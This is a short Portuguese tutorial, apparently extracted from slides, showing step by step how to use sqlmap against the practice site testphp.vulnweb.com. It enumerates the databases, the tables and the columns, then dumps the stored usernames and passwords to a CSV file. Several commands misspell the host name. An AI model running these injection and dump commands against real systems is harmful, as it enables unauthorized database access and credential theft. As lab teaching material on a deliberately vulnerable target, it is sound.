Prévia do material em texto
Elaborado por Apolonio Santiago Junior apolocomputacao@gmail.com Ataque SQLMAP OBJETO: Obter o usuário e senha da aplicação vulnerável, no link http://testphp.vulnweb.com/login.php Figura 01 - Alvo do ataque Comandos que serão utilizados: Primeiro vamos descobrir o Banco de Dados # sqlmap -u testephp.vulnweb.com/listproducts.php?cat=1 -dbs sqlmap -u testephp.vulnweb.com/listproducts.php?cat=1 -dbs Figura 02 - Comando para identificar o Banco de Dados http://testphp.vulnweb.com/login.php Elaborado por Apolonio Santiago Junior apolocomputacao@gmail.com Verificando as tabelas # sqlmap -u testephp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables Figura 03 - Comando para verificar as tabelas Figura 04 - Listagem das tabelas Verificando qual tabela e colunas desejo usar (users possui o login e senha) # sqlmap -u testephp..vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns Figura 05 - Comando para verificar as colunas da tabela users Elaborado por Apolonio Santiago Junior apolocomputacao@gmail.com Figura 06 - Listagem das colunas da tabela users Esse comando abaixo pode ser demorado, pode ser feito de duas partes: primeiro o nome # sqlmap -u testephp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C uname --dump Figura 05 - Comando para buscar o usuário da tabela users Figura 07 - identificando o nome do usuário armazenado no campo test Segunda parte pegando a senha Elaborado por Apolonio Santiago Junior apolocomputacao@gmail.com # sqlmap -u testephp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C pass --dump Figura 08 - Comando para verificar as colunas da tabela users Figura 09 - identificando a senha armazenada no campo pass # Além do resultado ser exibido na tela o usuário pode acessar o arquivo CSV gerado /Users/santiago/.sqlmap/output/testephp.vulnweb.com/dump/acuart/users.csv Figura 10 - Acessando o arquivo csv com as senhas